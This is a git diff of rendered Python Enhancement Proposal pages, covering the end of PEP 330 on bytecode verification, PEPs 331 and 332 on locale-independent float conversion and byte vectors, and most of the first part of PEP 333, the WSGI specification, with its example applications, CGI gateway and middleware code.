  5. At no point during execution can the value stack grow to a +depth greater than that implied by co_stacksize.
  6. +
  7. Execution never falls off the bottom of co_code.
  8. +
+
+
+

Implementation

+

This PEP is the working document for a Python bytecode +verification implementation written in Python. This +implementation is not used implicitly by the PVM before executing +any bytecode, but is to be used explicitly by users concerned +about possibly invalid bytecode with the following snippet:

+
import verify
+verify.verify(object)
+
+
+

The verify module provides a verify function which accepts the +same kind of arguments as dis.dis: classes, methods, functions, +or code objects. It verifies that the object’s bytecode is +well-formed according to the specifications of this PEP.

+

If the code is well-formed the call to verify returns silently +without error. If an error is encountered, it throws a +VerificationError whose argument indicates the cause of the +failure. It is up to the programmer whether or not to handle the +error in some way or execute the invalid code regardless.

+

Phillip Eby has proposed a pseudo-code algorithm for bytecode +stack depth verification used by the reference implementation.
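By way of illustration only, here is a small check in the spirit of the first operand constraint, written in Python against the dis module of current CPython rather than the 2.x bytecode this PEP targets (a sketch, not the PEP's reference implementation):

import dis

def check_jump_targets(code):
    # offsets at which instructions actually begin
    offsets = {instr.offset for instr in dis.get_instructions(code)}
    for instr in dis.get_instructions(code):
        if instr.opcode in dis.hasjrel or instr.opcode in dis.hasjabs:
            # every jump must land on an instruction boundary
            if instr.argval not in offsets:
                raise ValueError("jump to non-instruction offset %r" % (instr.argval,))

def f(x):
    if x:
        return 1
    return 2

check_jump_targets(f.__code__)   # passes silently for well-formed code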

+
+
+

Verification Issues

+

This PEP describes only a small number of verifications. While +discussion and analysis will lead to many more, it is highly +possible that future verification may need to be done or custom, +project-specific verifications. For this reason, it might be +desirable to add a verification registration interface to the test +implementation to register future verifiers. The need for this is +minimal since custom verifiers can subclass and extend the current +implementation for added behavior.

+
+
+

Required Changes

+

Armin Rigo noted that several byte-codes will need modification in +order for their stack effect to be statically analyzed. These are +END_FINALLY, POP_BLOCK, and MAKE_CLOSURE. Armin and Guido have +already agreed on how to correct the instructions. Currently the +Python implementation punts on these instructions.

+

This PEP does not propose to add the verification step to the +interpreter, but only to provide the Python implementation in the +standard library for optional use. Whether or not this +verification procedure is translated into C, included with the PVM +or enforced in any way is left for future discussion.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0330.rst

+


+ +
+ +
+ \ No newline at end of file diff --git a/pep-0331/index.html b/pep-0331/index.html new file mode 100644 index 00000000000..de42a950e3b --- /dev/null +++ b/pep-0331/index.html @@ -0,0 +1,321 @@ + PEP 331 – Locale-Independent Float/String Conversions | peps.python.org
+
+


+ + +
+
+
+

PEP 331 – Locale-Independent Float/String Conversions

+
+
Author:
+
Christian R. Reis <kiko at async.com.br>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Jul-2003
+
Python-Version:
+
2.4
+
Post-History:
+
21-Jul-2003, 13-Aug-2003, 18-Jun-2004
+
+
+
+
+
+

Abstract

+

Support for the LC_NUMERIC locale category in Python 2.3 is +implemented only in Python-space. This causes inconsistent +behavior and thread-safety issues for applications that use +extension modules and libraries implemented in C that parse and +generate floats from strings. This document proposes a plan for +removing this inconsistency by providing and using substitute +locale-agnostic functions as necessary.

+
+
+

Introduction

+

Python provides generic localization services through the locale +module, which among other things allows localizing the display and +conversion process of numeric types. Locale categories, such as +LC_TIME and LC_COLLATE, allow configuring precisely what aspects +of the application are to be localized.

+

The LC_NUMERIC category specifies formatting for non-monetary +numeric information, such as the decimal separator in float and +fixed-precision numbers. Localization of the LC_NUMERIC category +is currently implemented only in Python-space; C libraries invoked +from the Python runtime are unaware of Python’s LC_NUMERIC +setting. This is done to avoid changing the behavior of certain +low-level functions that are used by the Python parser and related +code [2].
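The split is visible from Python itself (a doctest-style sketch; it assumes a pt_BR locale is installed, and uses the locale module's own conversion helpers):

>>> import locale
>>> locale.setlocale(locale.LC_NUMERIC, 'pt_BR')   # assumes this locale exists
'pt_BR'
>>> locale.str(1.5)      # locale-aware formatting from the locale module
'1,5'
>>> str(1.5)             # the builtin stays locale-unaware
'1.5'
>>> locale.atof('1,5')   # locale-aware parsing
1.5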

+

However, this presents a problem for extension modules that wrap C +libraries. Applications that use these extension modules will +inconsistently display and convert floating-point values.

+

James Henstridge, the author of PyGTK [3], has additionally +pointed out that the setlocale() function also presents +thread-safety issues, since a thread may call the C library +setlocale() outside of the GIL, and cause Python to parse and +generate floats incorrectly.

+
+
+

Rationale

+

The inconsistency between Python and C library localization for +LC_NUMERIC is a problem for any localized application using C +extensions. The exact nature of the problem will vary depending +on the application, but it will most likely occur when parsing or +formatting a floating-point value.

+
+
+

Example Problem

+

The initial problem that motivated this PEP is related to the +GtkSpinButton [4] widget in the GTK+ UI toolkit, wrapped by the +PyGTK module. The widget can be set to numeric mode, and when +this occurs, characters typed into it are evaluated as a number.

+

Problems occur when LC_NUMERIC is set to a locale with a float +separator that differs from the C locale’s standard (for instance, +‘,’ instead of ‘.’ for the Brazilian locale pt_BR). Because +LC_NUMERIC is not set at the libc level, float values are +displayed incorrectly (using ‘.’ as a separator) in the +spinbutton’s text entry, and it is impossible to enter fractional +values using the ‘,’ separator.

+

This small example demonstrates reduced usability for localized +applications using this toolkit when coded in Python.

+
+
+

Proposal

+

Martin v. Löwis commented on the initial constraints for an +acceptable solution to the problem on python-dev:

+
    +
  • LC_NUMERIC can be set at the C library level without +breaking the parser.
  • +
  • float() and str() stay locale-unaware.
  • +
  • locale-aware str() and atof() stay in the locale module.
  • +
+

An analysis of the Python source suggests that the following +functions currently depend on LC_NUMERIC being set to the C +locale:

+
    +
  • Python/compile.c:parsenumber()
  • +
  • Python/marshal.c:r_object()
  • +
  • Objects/complexobject.c:complex_to_buf()
  • +
  • Objects/complexobject.c:complex_subtype_from_string()
  • +
  • Objects/floatobject.c:PyFloat_FromString()
  • +
  • Objects/floatobject.c:format_float()
  • +
  • Objects/stringobject.c:formatfloat()
  • +
  • Modules/stropmodule.c:strop_atof()
  • +
  • Modules/cPickle.c:load_float()
  • +
+

The proposed approach is to implement LC_NUMERIC-agnostic +functions for converting from (strtod()/atof()) and to +(snprintf()) float formats, using these functions where the +formatting should not vary according to the user-specified locale.

+

The locale module should also be changed to remove the +special-casing for LC_NUMERIC.

+

This change should also solve the aforementioned thread-safety +problems.

+
+
+

Potential Code Contributions

+

This problem was initially reported as a problem in the GTK+ +libraries [5]; since then it has been correctly diagnosed as an +inconsistency in Python’s implementation. However, in a fortunate +coincidence, the glib library (developed primarily for GTK+, not +to be confused with the GNU C library) implements a number of +LC_NUMERIC-agnostic functions (for an example, see [6]) for +reasons similar to those presented in this paper.

+

In the same GTK+ problem report, Havoc Pennington suggested that +the glib authors would be willing to contribute this code to the +PSF, which would simplify implementation of this PEP considerably. +Alex Larsson, the original author of the glib code, submitted a +PSF Contributor Agreement [7] on 2003-08-20 [8] to ensure the code +could be safely integrated; this agreement has been received and +accepted.

+
+
+

Risks

+

There may be cross-platform issues with the provided +locale-agnostic functions, though this risk is low given that the +code supplied simply reverses any locale-dependent changes made to +floating-point numbers.

+

Martin and Guido pointed out potential copyright issues with the +contributed code. I believe we will have no problems in this area +as members of the GTK+ and glib teams have said they are fine with +relicensing the code, and a PSF contributor agreement has been +mailed in to ensure this safety.

+

Tim Peters has pointed out [9] that there are situations involving +threading in which the proposed change is insufficient to solve +the problem completely. A complete solution, however, does not +currently exist.

+
+
+

Implementation

+

An implementation was developed by Gustavo Carneiro <gjc at +inescporto.pt>, and attached to Sourceforge.net bug 774665 [10]

+

The final patch [11] was integrated into Python CVS by Martin v. +Löwis on 2004-06-08, as stated in the bug report.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0331.rst

+


+ +
+ +
+ \ No newline at end of file diff --git a/pep-0332/index.html b/pep-0332/index.html new file mode 100644 index 00000000000..cbbe1625c50 --- /dev/null +++ b/pep-0332/index.html @@ -0,0 +1,193 @@ + PEP 332 – Byte vectors and String/Unicode Unification | peps.python.org
+
+


+ + +
+
+
+

PEP 332 – Byte vectors and String/Unicode Unification

+
+
Author:
+
Skip Montanaro <skip at pobox.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Aug-2004
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP outlines the introduction of a raw bytes sequence object +and the unification of the current str and unicode objects.

+
+
+

Rejection Notice

+

This PEP is rejected in this form. The author has expressed lack of +time to continue to shepherd it, and discussion on python-dev has +moved to a slightly different proposal which will (eventually) be +written up as a new PEP. See the thread starting at +https://mail.python.org/pipermail/python-dev/2006-February/060930.html.

+
+
+

Rationale

+

Python’s current string objects are overloaded. They serve both to +hold ASCII and non-ASCII character data and to also hold sequences of +raw bytes which have no reasonable interpretation as displayable +character sequences. This overlap hasn’t been a big problem in the +past, but as Python moves closer to requiring source code to be +properly encoded, the use of strings to represent raw byte sequences +will be more problematic. In addition, as Python’s Unicode support +has improved, it’s easier to consider strings as ASCII-encoded Unicode +objects.

+
+
+

Proposed Implementation

+

The number in parentheses indicates the Python version in which the +feature will be introduced.

+
    +
  • Add a bytes builtin which is just a synonym for str. (2.5)
  • +
  • Add a b"..." string literal which is equivalent to raw string literals, with the exception that values which conflict with the source encoding of the containing file do not generate warnings. (2.5)
  • +
  • Warn about the use of variables named “bytes”. (2.5 or 2.6)
  • +
  • Introduce a bytes builtin which refers to a sequence distinct +from the str type. (2.6)
  • +
  • Make str a synonym for unicode. (3.0)
  • +
+
+
+

Bytes Object API

+

TBD.

+
+
+

Issues

+
    +
  • Can this be accomplished before Python 3.0?
  • +
  • Should bytes objects be mutable or immutable? (Guido seems to +like them to be mutable.)
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0332.rst

+


+ +
+ +
+ \ No newline at end of file diff --git a/pep-0333/index.html b/pep-0333/index.html new file mode 100644 index 00000000000..1dc05aae5e2 --- /dev/null +++ b/pep-0333/index.html @@ -0,0 +1,1689 @@ + PEP 333 – Python Web Server Gateway Interface v1.0 | peps.python.org
+
+


+ + +
+
+
+

PEP 333 – Python Web Server Gateway Interface v1.0

+
+
Author:
+
Phillip J. Eby <pje at telecommunity.com>
+
Discussions-To:
+
Web-SIG list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
07-Dec-2003
+
Post-History:
+
07-Dec-2003, 08-Aug-2004, 20-Aug-2004, 27-Aug-2004, 27-Sep-2010
+
Superseded-By:
+
3333
+
+
+
+
+
+

Preface

+

Note: For an updated version of this spec that supports Python 3.x and +includes community errata, addenda, and clarifications, please +see PEP 3333 instead.

+
+
+

Abstract

+

This document specifies a proposed standard interface between web +servers and Python web applications or frameworks, to promote web +application portability across a variety of web servers.

+
+
+
Rationale and Goals
+
Python currently boasts a wide variety of web application frameworks, such as Zope, Quixote, Webware, SkunkWeb, PSO, and Twisted Web – to name just a few [1]. This wide variety of choices can be a problem for new Python users, because generally speaking, their choice of web framework will limit their choice of usable web servers, and vice versa.
+
By contrast, although Java has just as many web application frameworks available, Java’s “servlet” API makes it possible for applications written with any Java web application framework to run in any web server that supports the servlet API.
+
The availability and widespread use of such an API in web servers for Python – whether those servers are written in Python (e.g. Medusa), embed Python (e.g. mod_python), or invoke Python via a gateway protocol (e.g. CGI, FastCGI, etc.) – would separate choice of framework from choice of web server, freeing users to choose a pairing that suits them, while freeing framework and server developers to focus on their preferred area of specialization.
+
This PEP, therefore, proposes a simple and universal interface between web servers and web applications or frameworks: the Python Web Server Gateway Interface (WSGI).
+
But the mere existence of a WSGI spec does nothing to address the existing state of servers and frameworks for Python web applications. Server and framework authors and maintainers must actually implement WSGI for there to be any effect.
+
However, since no existing servers or frameworks support WSGI, there is little immediate reward for an author who implements WSGI support. Thus, WSGI must be easy to implement, so that an author’s initial investment in the interface can be reasonably low.
+
Thus, simplicity of implementation on both the server and framework sides of the interface is absolutely critical to the utility of the WSGI interface, and is therefore the principal criterion for any design decisions.
+
Note, however, that simplicity of implementation for a framework author is not the same thing as ease of use for a web application author. WSGI presents an absolutely “no frills” interface to the framework author, because bells and whistles like response objects and cookie handling would just get in the way of existing frameworks’ handling of these issues. Again, the goal of WSGI is to facilitate easy interconnection of existing servers and applications or frameworks, not to create a new web framework.
+
Note also that this goal precludes WSGI from requiring anything that is not already available in deployed versions of Python. Therefore, new standard library modules are not proposed or required by this specification, and nothing in WSGI requires a Python version greater than 2.2.2. (It would be a good idea, however, for future versions of Python to include support for this interface in web servers provided by the standard library.)
+
In addition to ease of implementation for existing and future frameworks and servers, it should also be easy to create request preprocessors, response postprocessors, and other WSGI-based “middleware” components that look like an application to their containing server, while acting as a server for their contained applications.
+
If middleware can be both simple and robust, and WSGI is widely available in servers and frameworks, it allows for the possibility of an entirely new kind of Python web application framework: one consisting of loosely-coupled WSGI middleware components. Indeed, existing framework authors may even choose to refactor their frameworks’ existing services to be provided in this way, becoming more like libraries used with WSGI, and less like monolithic frameworks. This would then allow application developers to choose “best-of-breed” components for specific functionality, rather than having to commit to all the pros and cons of a single framework.
+
Of course, as of this writing, that day is doubtless quite far off. In the meantime, it is a sufficient short-term goal for WSGI to enable the use of any framework with any server.
+
Finally, it should be mentioned that the current version of WSGI does not prescribe any particular mechanism for “deploying” an application for use with a web server or server gateway. At the present time, this is necessarily implementation-defined by the server or gateway. After a sufficient number of servers and frameworks have implemented WSGI to provide field experience with varying deployment requirements, it may make sense to create another PEP, describing a deployment standard for WSGI servers and application frameworks.
+
+
+
Specification Overview
+
The WSGI interface has two sides: the “server” or “gateway” side, and the “application” or “framework” side. The server side invokes a callable object that is provided by the application side. The specifics of how that object is provided are up to the server or gateway. It is assumed that some servers or gateways will require an application’s deployer to write a short script to create an instance of the server or gateway, and supply it with the application object. Other servers and gateways may use configuration files or other mechanisms to specify where an application object should be imported from, or otherwise obtained.
+
In addition to “pure” servers/gateways and applications/frameworks, it is also possible to create “middleware” components that implement both sides of this specification. Such components act as an application to their containing server, and as a server to a contained application, and can be used to provide extended APIs, content transformation, navigation, and other useful functions.
+
Throughout this specification, we will use the term “a callable” to mean “a function, method, class, or an instance with a __call__ method”. It is up to the server, gateway, or application implementing the callable to choose the appropriate implementation technique for their needs. Conversely, a server, gateway, or application that is invoking a callable must not have any dependency on what kind of callable was provided to it. Callables are only to be called, not introspected upon.
+
+
The Application/Framework Side
+
The application object is simply a callable object that accepts two arguments. The term “object” should not be misconstrued as requiring an actual object instance: a function, method, class, or instance with a __call__ method are all acceptable for use as an application object. Application objects must be able to be invoked more than once, as virtually all servers/gateways (other than CGI) will make such repeated requests.
+
(Note: although we refer to it as an “application” object, this should not be construed to mean that application developers will use WSGI as a web programming API! It is assumed that application developers will continue to use existing, high-level framework services to develop their applications. WSGI is a tool for framework and server developers, and is not intended to directly support application developers.)
+
Here are two example application objects; one is a function, and the other is a class:
+
def simple_app(environ, start_response):
+    """Simplest possible application object"""
+    status = '200 OK'
+    response_headers = [('Content-type', 'text/plain')]
+    start_response(status, response_headers)
+    return ['Hello world!\n']
+
+
+class AppClass:
+    """Produce the same output, but using a class
+
+    (Note: 'AppClass' is the "application" here, so calling it
+    returns an instance of 'AppClass', which is then the iterable
+    return value of the "application callable" as required by
+    the spec.
+
+    If we wanted to use *instances* of 'AppClass' as application
+    objects instead, we would have to implement a '__call__'
+    method, which would be invoked to execute the application,
+    and we would need to create an instance for use by the
+    server or gateway.)
+    """
+
+    def __init__(self, environ, start_response):
+        self.environ = environ
+        self.start = start_response
+
+    def __iter__(self):
+        status = '200 OK'
+        response_headers = [('Content-type', 'text/plain')]
+        self.start(status, response_headers)
+        yield "Hello world!\n"
+
+
+
+
+
The Server/Gateway Side
+
The server or gateway invokes the application callable once for each request it receives from an HTTP client that is directed at the application. To illustrate, here is a simple CGI gateway, implemented as a function taking an application object. Note that this simple example has limited error handling, because by default an uncaught exception will be dumped to sys.stderr and logged by the web server.
+
import os, sys
+
+def run_with_cgi(application):
+
+    environ = dict(os.environ.items())
+    environ['wsgi.input']        = sys.stdin
+    environ['wsgi.errors']       = sys.stderr
+    environ['wsgi.version']      = (1, 0)
+    environ['wsgi.multithread']  = False
+    environ['wsgi.multiprocess'] = True
+    environ['wsgi.run_once']     = True
+
+    if environ.get('HTTPS', 'off') in ('on', '1'):
+        environ['wsgi.url_scheme'] = 'https'
+    else:
+        environ['wsgi.url_scheme'] = 'http'
+
+    headers_set = []
+    headers_sent = []
+
+    def write(data):
+        if not headers_set:
+            raise AssertionError("write() before start_response()")
+
+        elif not headers_sent:
+            # Before the first output, send the stored headers
+            status, response_headers = headers_sent[:] = headers_set
+            sys.stdout.write('Status: %s\r\n' % status)
+            for header in response_headers:
+                sys.stdout.write('%s: %s\r\n' % header)
+            sys.stdout.write('\r\n')
+
+        sys.stdout.write(data)
+        sys.stdout.flush()
+
+    def start_response(status, response_headers, exc_info=None):
+        if exc_info:
+            try:
+                if headers_sent:
+                    # Re-raise original exception if headers sent
+                    raise exc_info[0], exc_info[1], exc_info[2]
+            finally:
+                exc_info = None     # avoid dangling circular ref
+        elif headers_set:
+            raise AssertionError("Headers already set!")
+
+        headers_set[:] = [status, response_headers]
+        return write
+
+    result = application(environ, start_response)
+    try:
+        for data in result:
+            if data:    # don't send headers until body appears
+                write(data)
+        if not headers_sent:
+            write('')   # send headers now if body was empty
+    finally:
+        if hasattr(result, 'close'):
+            result.close()
+
+
+
+
+
Middleware: Components that Play Both Sides
+
Note that a single object may play the role of a server with respect to some application(s), while also acting as an application with respect to some server(s). Such “middleware” components can perform such functions as:
+
• Routing a request to different application objects based on the target URL, after rewriting the environ accordingly (see the sketch after this list)
• Allowing multiple applications or frameworks to run side by side in the same process
• Load balancing and remote processing, by forwarding requests and responses over a network
• Performing content postprocessing, such as applying XSL stylesheets
+
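For illustration, here is a minimal sketch of the first function above: a middleware component that routes on the first path segment. The Router class, its apps mapping, and the not_found fallback are illustrative names, not part of this specification:
+
+class Router:
+    """Dispatch to one of several applications by URL prefix (a sketch)."""
+
+    def __init__(self, apps, not_found):
+        self.apps = apps              # e.g. {'/blog': blog_app}
+        self.not_found = not_found    # fallback application
+
+    def __call__(self, environ, start_response):
+        path = environ.get('PATH_INFO', '')
+        segment = '/' + path[1:].split('/', 1)[0]
+        app = self.apps.get(segment)
+        if app is None:
+            return self.not_found(environ, start_response)
+        # Shift the matched segment from PATH_INFO to SCRIPT_NAME, so
+        # the inner application sees its own virtual "location".
+        environ['SCRIPT_NAME'] = environ.get('SCRIPT_NAME', '') + segment
+        environ['PATH_INFO'] = path[len(segment):]
+        return app(environ, start_response)
+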
The presence of middleware in general is transparent to both the “server/gateway” and the “application/framework” sides of the interface, and should require no special support. A user who desires to incorporate middleware into an application simply provides the middleware component to the server, as if it were an application, and configures the middleware component to invoke the application, as if the middleware component were a server. Of course, the “application” that the middleware wraps may in fact be another middleware component wrapping another application, and so on, creating what is referred to as a “middleware stack”.
+
For the most part, middleware must conform to the restrictions and requirements of both the server and application sides of WSGI. In some cases, however, requirements for middleware are more stringent than for a “pure” server or application, and these points will be noted in the specification.
+
Here is a (tongue-in-cheek) example of a middleware component that converts text/plain responses to pig Latin, using Joe Strout’s piglatin.py. (Note: a “real” middleware component would probably use a more robust way of checking the content type, and should also check for a content encoding. Also, this simple example ignores the possibility that a word might be split across a block boundary.)
+
from piglatin import piglatin
+
+class LatinIter:
+
+    """Transform iterated output to piglatin, if it's okay to do so
+
+    Note that the "okayness" can change until the application yields
+    its first non-empty string, so 'transform_ok' has to be a mutable
+    truth value.
+    """
+
+    def __init__(self, result, transform_ok):
+        if hasattr(result, 'close'):
+            self.close = result.close
+        self._next = iter(result).next
+        self.transform_ok = transform_ok
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        if self.transform_ok:
+            return piglatin(self._next())
+        else:
+            return self._next()
+
+class Latinator:
+
+    # by default, don't transform output
+    transform = False
+
+    def __init__(self, application):
+        self.application = application
+
+    def __call__(self, environ, start_response):
+
+        transform_ok = []
+
+        def start_latin(status, response_headers, exc_info=None):
+
+            # Reset ok flag, in case this is a repeat call
+            del transform_ok[:]
+
+            for name, value in response_headers:
+                if name.lower() == 'content-type' and value == 'text/plain':
+                    transform_ok.append(True)
+                    # Strip content-length if present, else it'll be wrong
+                    response_headers = [(name, value)
+                        for name, value in response_headers
+                            if name.lower() != 'content-length'
+                    ]
+                    break
+
+            write = start_response(status, response_headers, exc_info)
+
+            if transform_ok:
+                def write_latin(data):
+                    write(piglatin(data))
+                return write_latin
+            else:
+                return write
+
+        return LatinIter(self.application(environ, start_latin), transform_ok)
+
+
+# Run foo_app under a Latinator's control, using the example CGI gateway
+from foo_app import foo_app
+run_with_cgi(Latinator(foo_app))
+
+
+
+
+
+
Specification Details
+
The application object must accept two positional arguments. For the sake of illustration, we have named them environ and start_response, but they are not required to have these names. A server or gateway must invoke the application object using positional (not keyword) arguments. (E.g. by calling result = application(environ, start_response) as shown above.)
+
The environ parameter is a dictionary object, containing CGI-style environment variables. This object must be a builtin Python dictionary (not a subclass, UserDict or other dictionary emulation), and the application is allowed to modify the dictionary in any way it desires. The dictionary must also include certain WSGI-required variables (described in a later section), and may also include server-specific extension variables, named according to a convention that will be described below.
+
The start_response parameter is a callable accepting two required positional arguments, and one optional argument. For the sake of illustration, we have named these arguments status, response_headers, and exc_info, but they are not required to have these names, and the application must invoke the start_response callable using positional arguments (e.g. start_response(status, response_headers)).
+
The status parameter is a status string of the form "999 Message here", and response_headers is a list of (header_name, header_value) tuples describing the HTTP response header. The optional exc_info parameter is described below in the sections on The start_response() Callable and Error Handling. It is used only when the application has trapped an error and is attempting to display an error message to the browser.
+
The start_response callable must return a write(body_data) callable that takes one positional parameter: a string to be written as part of the HTTP response body. (Note: the write() callable is provided only to support certain existing frameworks’ imperative output APIs; it should not be used by new applications or frameworks if it can be avoided. See the Buffering and Streaming section for more details.)
+
When called by the server, the application object must return an iterable yielding zero or more strings. This can be accomplished in a variety of ways, such as by returning a list of strings, or by the application being a generator function that yields strings, or by the application being a class whose instances are iterable. Regardless of how it is accomplished, the application object must always return an iterable yielding zero or more strings.
+
The server or gateway must transmit the yielded strings to the client in an unbuffered fashion, completing the transmission of each string before requesting another one. (In other words, applications should perform their own buffering. See the Buffering and Streaming section below for more on how application output must be handled.)
+
The server or gateway should treat the yielded strings as binary byte sequences: in particular, it should ensure that line endings are not altered. The application is responsible for ensuring that the string(s) to be written are in a format suitable for the client. (The server or gateway may apply HTTP transfer encodings, or perform other transformations for the purpose of implementing HTTP features such as byte-range transmission. See Other HTTP Features, below, for more details.)
+
If a call to len(iterable) succeeds, the server must be able to rely on the result being accurate. That is, if the iterable returned by the application provides a working __len__() method, it must return an accurate result. (See the Handling the Content-Length Header section for information on how this would normally be used.)
+
If the iterable returned by the application has a close() method, the server or gateway must call that method upon completion of the current request, whether the request was completed normally, or terminated early due to an error (this is to support resource release by the application). This protocol is intended to complement PEP 325’s generator support, and other common iterables with close() methods.
+
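To make the close() requirement concrete, here is a sketch (not part of the specification) of an application iterable that uses close() to release an open file; the FileIterable name is illustrative:
+
+class FileIterable:
+    """An iterable body whose close() releases a resource (a sketch)."""
+
+    def __init__(self, filelike, blksize=8192):
+        self.filelike = filelike
+        self.blksize = blksize
+
+    def __iter__(self):
+        # Yield successive blocks until read() returns an empty string
+        return iter(lambda: self.filelike.read(self.blksize), '')
+
+    def close(self):
+        # Invoked by the server/gateway in its 'finally' clause, whether
+        # the request completed normally or was terminated early
+        self.filelike.close()
+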
(Note: the application must invoke the start_response() callable before the iterable yields its first body string, so that the server can send the headers before any body content. However, this invocation may be performed by the iterable’s first iteration, so servers must not assume that start_response() has been called before they begin iterating over the iterable.)
+
Finally, servers and gateways must not directly use any other attributes of the iterable returned by the application, unless it is an instance of a type specific to that server or gateway, such as a “file wrapper” returned by wsgi.file_wrapper (see Optional Platform-Specific File Handling). In the general case, only attributes specified here, or accessed via e.g. the PEP 234 iteration APIs are acceptable.
+
+
environ Variables
+
The environ dictionary is required to contain these CGI environment variables, as defined by the Common Gateway Interface specification [2]. The following variables must be present, unless their value would be an empty string, in which case they may be omitted, except as otherwise noted below.
+
+
REQUEST_METHOD
The HTTP request method, such as "GET" or "POST". This cannot ever be an empty string, and so is always required.
+
SCRIPT_NAME
The initial portion of the request URL’s “path” that corresponds to the application object, so that the application knows its virtual “location”. This may be an empty string, if the application corresponds to the “root” of the server.
+
PATH_INFO
The remainder of the request URL’s “path”, designating the virtual “location” of the request’s target within the application. This may be an empty string, if the request URL targets the application root and does not have a trailing slash.
+
QUERY_STRING
The portion of the request URL that follows the "?", if any. May be empty or absent.
+
CONTENT_TYPE
The contents of any Content-Type fields in the HTTP request. May be empty or absent.
+
CONTENT_LENGTH
The contents of any Content-Length fields in the HTTP request. May be empty or absent.
+
SERVER_NAME, SERVER_PORT
When combined with SCRIPT_NAME and PATH_INFO, these variables can be used to complete the URL. Note, however, that HTTP_HOST, if present, should be used in preference to SERVER_NAME for reconstructing the request URL. See the URL Reconstruction section below for more detail. SERVER_NAME and SERVER_PORT can never be empty strings, and so are always required.
+
SERVER_PROTOCOL
The version of the protocol the client used to send the request. Typically this will be something like "HTTP/1.0" or "HTTP/1.1" and may be used by the application to determine how to treat any HTTP request headers. (This variable should probably be called REQUEST_PROTOCOL, since it denotes the protocol used in the request, and is not necessarily the protocol that will be used in the server’s response. However, for compatibility with CGI we have to keep the existing name.)
+
HTTP_ Variables
Variables corresponding to the client-supplied HTTP request headers (i.e., variables whose names begin with "HTTP_"). The presence or absence of these variables should correspond with the presence or absence of the appropriate HTTP header in the request.
+
+
A server or gateway should attempt to provide as many other CGI variables as are applicable. In addition, if SSL is in use, the server or gateway should also provide as many of the Apache SSL environment variables [3] as are applicable, such as HTTPS=on and SSL_PROTOCOL. Note, however, that an application that uses any CGI variables other than the ones listed above is necessarily non-portable to web servers that do not support the relevant extensions. (For example, web servers that do not publish files will not be able to provide a meaningful DOCUMENT_ROOT or PATH_TRANSLATED.)
+
A WSGI-compliant server or gateway should document what variables it provides, along with their definitions as appropriate. Applications should check for the presence of any variables they require, and have a fallback plan in the event such a variable is absent.
+
Note: missing variables (such as REMOTE_USER when no authentication has occurred) should be left out of the environ dictionary. Also note that CGI-defined variables must be strings, if they are present at all. It is a violation of this specification for a CGI variable’s value to be of any type other than str.
+
In addition to the CGI-defined variables, the environ dictionary may also contain arbitrary operating-system “environment variables”, and must contain the following WSGI-defined variables:
wsgi.version
The tuple (1, 0), representing WSGI version 1.0.
+
wsgi.url_scheme
A string representing the “scheme” portion of the URL at which the application is being invoked. Normally, this will have the value "http" or "https", as appropriate.
+
wsgi.input
An input stream (file-like object) from which the HTTP request body can be read. (The server or gateway may perform reads on-demand as requested by the application, or it may pre-read the client’s request body and buffer it in-memory or on disk, or use any other technique for providing such an input stream, according to its preference.)
+
wsgi.errors
An output stream (file-like object) to which error output can be written, for the purpose of recording program or other errors in a standardized and possibly centralized location. This should be a “text mode” stream; i.e., applications should use "\n" as a line ending, and assume that it will be converted to the correct line ending by the server/gateway. For many servers, wsgi.errors will be the server’s main error log. Alternatively, this may be sys.stderr, or a log file of some sort. The server’s documentation should include an explanation of how to configure this or where to find the recorded output. A server or gateway may supply different error streams to different applications, if this is desired.
+
wsgi.multithread
This value should evaluate true if the application object may be simultaneously invoked by another thread in the same process, and should evaluate false otherwise.
+
wsgi.multiprocess
This value should evaluate true if an equivalent application object may be simultaneously invoked by another process, and should evaluate false otherwise.
+
wsgi.run_once
This value should evaluate true if the server or gateway expects (but does not guarantee!) that the application will only be invoked this one time during the life of its containing process. Normally, this will only be true for a gateway based on CGI (or something similar).
+
Finally, the environ dictionary may also contain server-defined variables. These variables should be named using only lower-case letters, numbers, dots, and underscores, and should be prefixed with a name that is unique to the defining server or gateway. For example, mod_python might define variables with names like mod_python.some_variable.
+
+
Input and Error Streams
+
The input and error streams provided by the server must support the following methods:
+
Method            Stream    Notes
read(size)        input     1
readline()        input     1, 2
readlines(hint)   input     1, 3
__iter__()        input
flush()           errors    4
write(str)        errors
writelines(seq)   errors
+
The semantics of each method are as documented in the Python Library Reference, except for these notes as listed in the table above:
+
1. The server is not required to read past the client’s specified Content-Length, and is allowed to simulate an end-of-file condition if the application attempts to read past that point. The application should not attempt to read more data than is specified by the CONTENT_LENGTH variable. (A sketch of such a length-limiting wrapper appears after this list.)
2. The optional “size” argument to readline() is not supported, as it may be complex for server authors to implement, and is not often used in practice.
3. Note that the hint argument to readlines() is optional for both caller and implementer. The application is free not to supply it, and the server or gateway is free to ignore it.
4. Since the errors stream may not be rewound, servers and gateways are free to forward write operations immediately, without buffering. In this case, the flush() method may be a no-op. Portable applications, however, cannot assume that output is unbuffered or that flush() is a no-op. They must call flush() if they need to ensure that output has in fact been written. (For example, to minimize intermingling of data from multiple processes writing to the same error log.)
+
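As a sketch of note 1’s end-of-file simulation, a gateway might wrap its raw input stream as follows; the LimitedInput name is illustrative, and the readline() shown is deliberately simplistic:
+
+class LimitedInput:
+    """Simulate EOF once CONTENT_LENGTH bytes have been read (a sketch)."""
+
+    def __init__(self, stream, length):
+        self.stream = stream
+        self.remaining = length
+
+    def read(self, size=-1):
+        if self.remaining <= 0:
+            return ''
+        if size < 0 or size > self.remaining:
+            size = self.remaining
+        data = self.stream.read(size)
+        self.remaining -= len(data)
+        return data
+
+    def readline(self):
+        if self.remaining <= 0:
+            return ''
+        # Simplistic: a real gateway must also take care not to read
+        # past the request body on the underlying connection.
+        line = self.stream.readline()[:self.remaining]
+        self.remaining -= len(line)
+        return line
+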
The methods listed in the table above must be supported by all servers conforming to this specification. Applications conforming to this specification must not use any other methods or attributes of the input or errors objects. In particular, applications must not attempt to close these streams, even if they possess close() methods.
+
+
+
+
The start_response() Callable
+
